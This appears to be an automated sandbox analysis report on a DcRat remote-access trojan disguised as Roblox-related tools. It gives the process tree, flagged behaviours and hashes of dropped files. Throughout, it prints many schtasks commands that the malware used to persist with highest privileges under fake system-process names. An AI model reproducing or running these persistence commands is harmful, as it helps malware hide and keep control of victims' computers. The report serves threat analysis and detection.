                                                                                                                                                                  SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST
                                                                                                                                                                  4⤵
                                                                                                                                                                  • DcRat
                                                                                                                                                                  PID:1948
                                                                                                                                                              • C:\Windows\system32\CMD.exe
                                                                                                                                                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Avid Pro Tools" /tr "C:\Users\Admin\AppData\Roaming\xdwdSublime Text.exe" /RL HIGHEST & exit
                                                                                                                                                                3⤵
                                                                                                                                                                  PID:1604
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 14 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\System.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:940
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\System.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2500
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-00A1-0409-0000-0000000FF1CE}-C\System.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:284
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\Windows\Registration\CRMLog\csrss.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:2540
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Registration\CRMLog\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:1536
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\Windows\Registration\CRMLog\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:2576
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Windows\AppPatch\ja-JP\smss.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1508
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\AppPatch\ja-JP\smss.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2100
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\Windows\AppPatch\ja-JP\smss.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1620
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 6 /tr "'C:\winNet\Bloxstrap.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2520
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "Bloxstrap" /sc ONLOGON /tr "'C:\winNet\Bloxstrap.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1616
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 7 /tr "'C:\winNet\Bloxstrap.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:2116
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\DESIGNER\lsass.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1944
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\DESIGNER\lsass.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2316
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Common Files\DESIGNER\lsass.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:1720
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "servicess" /sc MINUTE /mo 9 /tr "'C:\DriversavessessionDlldhcp\services.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2056
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\services.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2620
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\DriversavessessionDlldhcp\services.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2912
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\Refcrt.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:3004
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "Refcrt" /sc ONLOGON /tr "'C:\MSOCache\All Users\Refcrt.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:2220
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "RefcrtR" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\Refcrt.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1492
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Common Files\csrss.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:1820
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Common Files\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1152
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Common Files\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2968
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Users\Admin\Music\csrss.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2248
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Users\Admin\Music\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:2916
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\Music\csrss.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2840
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 6 /tr "'C:\Windows\twain_32\sppsvc.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2328
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\Windows\twain_32\sppsvc.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:1972
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 12 /tr "'C:\Windows\twain_32\sppsvc.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2740
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Portable Devices\dllhost.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2772
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Portable Devices\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2860
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Program Files (x86)\Windows Portable Devices\dllhost.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:2684
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\Microsoft\Windows\explorer.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1968
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Users\All Users\Microsoft\Windows\explorer.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2768
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Microsoft\Windows\explorer.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:2000
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:2960
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2228
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 11 /tr "'C:\MSOCache\All Users\{90140000-0044-0409-0000-0000000FF1CE}-C\OSPPSVC.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              PID:2072
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2284
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:840
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Microsoft.NET\Primary Interop Assemblies\wscript.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1624
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 12 /tr "'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\Bloxstrap.exe'" /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1632
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "Bloxstrap" /sc ONLOGON /tr "'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\Bloxstrap.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • DcRat
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:1784
                                                                                                                                                            • C:\Windows\system32\schtasks.exe
                                                                                                                                                              schtasks.exe /create /tn "BloxstrapB" /sc MINUTE /mo 6 /tr "'C:\Recovery\7da403a2-3a8c-11ef-b191-d685e2345d05\Bloxstrap.exe'" /rl HIGHEST /f
                                                                                                                                                              1⤵
                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                                                                                              PID:2496
                                                                                                                                                            • C:\Windows\system32\msiexec.exe
                                                                                                                                                              C:\Windows\system32\msiexec.exe /V
                                                                                                                                                              1⤵
                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                              • Enumerates connected drives
                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:1660
                                                                                                                                                              • C:\Windows\system32\MsiExec.exe
                                                                                                                                                                C:\Windows\system32\MsiExec.exe -Embedding 24DB5C81B615D0AD00A42217A5D9562F
                                                                                                                                                                2⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                PID:1948
                                                                                                                                                              • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                C:\Windows\syswow64\MsiExec.exe -Embedding C1A7B264966EDDF33BCF128627D0C296
                                                                                                                                                                2⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                PID:1968
                                                                                                                                                            • C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                              C:\Windows\system32\wbem\WmiApSrv.exe
                                                                                                                                                              1⤵
                                                                                                                                                                PID:2748
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 5 /tr "'C:\Users\Admin\AppData\Local\Roblox.exe'" /f
                                                                                                                                                                1⤵
                                                                                                                                                                • DcRat
                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                PID:1156
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Roblox.exe'" /rl HIGHEST /f
                                                                                                                                                                1⤵
                                                                                                                                                                • DcRat
                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                PID:2620
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 12 /tr "'C:\Users\Admin\AppData\Local\Roblox.exe'" /rl HIGHEST /f
                                                                                                                                                                1⤵
                                                                                                                                                                • DcRat
                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                PID:2716
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 14 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /f
                                                                                                                                                                1⤵
                                                                                                                                                                • DcRat
                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                • Scheduled Task/Job: Scheduled Task
                                                                                                                                                                PID:2404
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                schtasks.exe /create /tn "Roblox" /sc ONLOGON /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
                                                                                                                                                                1⤵
                                                                                                                                                                • DcRat
                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                PID:2920
                                                                                                                                                              • C:\Windows\system32\schtasks.exe
                                                                                                                                                                schtasks.exe /create /tn "RobloxR" /sc MINUTE /mo 9 /tr "'C:\DriversavessessionDlldhcp\Roblox.exe'" /rl HIGHEST /f
                                                                                                                                                                1⤵
                                                                                                                                                                • DcRat
                                                                                                                                                                • Process spawned unexpected child process
                                                                                                                                                                PID:2268
                                                                                                                                                              • C:\Windows\system32\conhost.exe
                                                                                                                                                                \??\C:\Windows\system32\conhost.exe "909049509-6533765031900255637-2070495065-305685155-1046318106-855059111423792356"
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:2720
                                                                                                                                                                • C:\Windows\system32\conhost.exe
                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe "6937931028219448122055107728-1831467133735503772-661204874-1257183238690169128"
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:2936

                                                                                                                                                                  Network

                                                                                                                                                                  MITRE ATT&CK Enterprise v15

                                                                                                                                                                  Replay Monitor

                                                                                                                                                                  Loading Replay Monitor...

                                                                                                                                                                  Downloads

                                                                                                                                                                  • C:\DriversavessessionDlldhcp\ghJPtatrYDLygnNWh9dEZv.vbe

                                                                                                                                                                    Filesize

                                                                                                                                                                    239B

                                                                                                                                                                    MD5

                                                                                                                                                                    3492e48fb2e9fb2bfc18658e3d8f88bd

                                                                                                                                                                    SHA1

                                                                                                                                                                    34cec8222aedc8baf774aa863a041a23971c7631

                                                                                                                                                                    SHA256

                                                                                                                                                                    c0857f8c479b8fa90402a735a24b312819cdcec5c69b90bd6dafc175dbfd3b2e

                                                                                                                                                                    SHA512

                                                                                                                                                                    a9923e942d86d3e29a52d421ceb96c8cef8aae769cbb18a65e93793e444cf7712c52aaba3a5da2f06d2ee5c3eef42d6972457b13aa06a060eaf9b26369d0efc9

                                                                                                                                                                  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

                                                                                                                                                                    Filesize

                                                                                                                                                                    304B

                                                                                                                                                                    MD5

                                                                                                                                                                    2efb2df4b7748e1d6c56d5b6215bdad5

                                                                                                                                                                    SHA1

                                                                                                                                                                    c4582691e9ff4969b93fe573b856a49fe250bbcb

                                                                                                                                                                    SHA256

                                                                                                                                                                    4832361a704c948acb8e15a702f0c7f5a0ef3e63fe822e1c503f9016519844a5

                                                                                                                                                                    SHA512

                                                                                                                                                                    39e6f01810a6692af891bd3675927a820419834e45bc244601cc9b52a01c7d3e869a9518612ee8d37fcd2c681392f910566e0bacdeb628dd8c252f46b05b61b0

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\0ZXuryP2Tv

                                                                                                                                                                    Filesize

                                                                                                                                                                    20KB

                                                                                                                                                                    MD5

                                                                                                                                                                    c9ff7748d8fcef4cf84a5501e996a641

                                                                                                                                                                    SHA1

                                                                                                                                                                    02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

                                                                                                                                                                    SHA256

                                                                                                                                                                    4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

                                                                                                                                                                    SHA512

                                                                                                                                                                    d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\1oaokwMKbm

                                                                                                                                                                    Filesize

                                                                                                                                                                    92KB

                                                                                                                                                                    MD5

                                                                                                                                                                    df8f707fde4a4e68ffee7c48f6a9b7db

                                                                                                                                                                    SHA1

                                                                                                                                                                    6852a7a4c463c3853643439794ed130a41d0c90b

                                                                                                                                                                    SHA256

                                                                                                                                                                    dc4e84de932df42fc1d78aa17751a6e21e723ae60796cd400e0b01c26d1b0449

                                                                                                                                                                    SHA512

                                                                                                                                                                    9c99fb4dc2c7727a75a632e28d3d18b6b4736f4484720788f9410a4567bf4aa4ed74fc6448a6a7d7cdff7bb4787e906a0f1c4e05c41ba02473e900f6aee9b7ba

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Bloxstrap.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    2.2MB

                                                                                                                                                                    MD5

                                                                                                                                                                    7529e4004c0fe742df146464e6aeadb0

                                                                                                                                                                    SHA1

                                                                                                                                                                    ae7341ee066b31de5a1a1a25851b70ced41de13f

                                                                                                                                                                    SHA256

                                                                                                                                                                    a80a68f1b63391ba9a91870173a0db962c73950c191594750e705f1d1c77be81

                                                                                                                                                                    SHA512

                                                                                                                                                                    d50112143b1a2acf918606e2f0a1d01fc2d5ed3e2e4ecdcdb2405669af2444a3274c7e39461c723d675e230f8cb72be351cdb1b8e31b9f5b5517a03c66f47f27

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\CabD2DB.tmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    70KB

                                                                                                                                                                    MD5

                                                                                                                                                                    49aebf8cbd62d92ac215b2923fb1b9f5

                                                                                                                                                                    SHA1

                                                                                                                                                                    1723be06719828dda65ad804298d0431f6aff976

                                                                                                                                                                    SHA256

                                                                                                                                                                    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

                                                                                                                                                                    SHA512

                                                                                                                                                                    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\Frage build.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    2.1MB

                                                                                                                                                                    MD5

                                                                                                                                                                    11fdce42422f8ed518fedf290f5bfc3c

                                                                                                                                                                    SHA1

                                                                                                                                                                    f18a4ad694af5ba50a7697b4cb66308454c555d9

                                                                                                                                                                    SHA256

                                                                                                                                                                    b62b6592549d56b573efdd053c73e37542742301fffbeb786a60c227564b97a3

                                                                                                                                                                    SHA512

                                                                                                                                                                    4e1c700ed33db9b29fe3545efeb7616ccf9c86b0716ee684d5375097651b44b3aab99302e6e159bb3f088b4cb59334aa473864d3d8b43a583b3cbfd9a12d16ae

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe

                                                                                                                                                                    Filesize

                                                                                                                                                                    797KB

                                                                                                                                                                    MD5

                                                                                                                                                                    36b62ba7d1b5e149a2c297f11e0417ee

                                                                                                                                                                    SHA1

                                                                                                                                                                    ce1b828476274375e632542c4842a6b002955603

                                                                                                                                                                    SHA256

                                                                                                                                                                    8353c5ace62fda6aba330fb3396e4aab11d7e0476f815666bd96a978724b9e0c

                                                                                                                                                                    SHA512

                                                                                                                                                                    fddec44631e7a800abf232648bbf417969cd5cc650f32c17b0cdc12a0a2afeb9a5dbf5c1f899bd2fa496bd22307bfc8d1237c94920fceafd84f47e13a6b98b94

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\TarD2FD.tmp

                                                                                                                                                                    Filesize

                                                                                                                                                                    181KB

                                                                                                                                                                    MD5

                                                                                                                                                                    4ea6026cf93ec6338144661bf1202cd1

                                                                                                                                                                    SHA1

                                                                                                                                                                    a1dec9044f750ad887935a01430bf49322fbdcb7

                                                                                                                                                                    SHA256

                                                                                                                                                                    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

                                                                                                                                                                    SHA512

                                                                                                                                                                    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\cYTMg7h175

                                                                                                                                                                    Filesize

                                                                                                                                                                    46KB

                                                                                                                                                                    MD5

                                                                                                                                                                    02d2c46697e3714e49f46b680b9a6b83

                                                                                                                                                                    SHA1

                                                                                                                                                                    84f98b56d49f01e9b6b76a4e21accf64fd319140

                                                                                                                                                                    SHA256

                                                                                                                                                                    522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

                                                                                                                                                                    SHA512

                                                                                                                                                                    60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

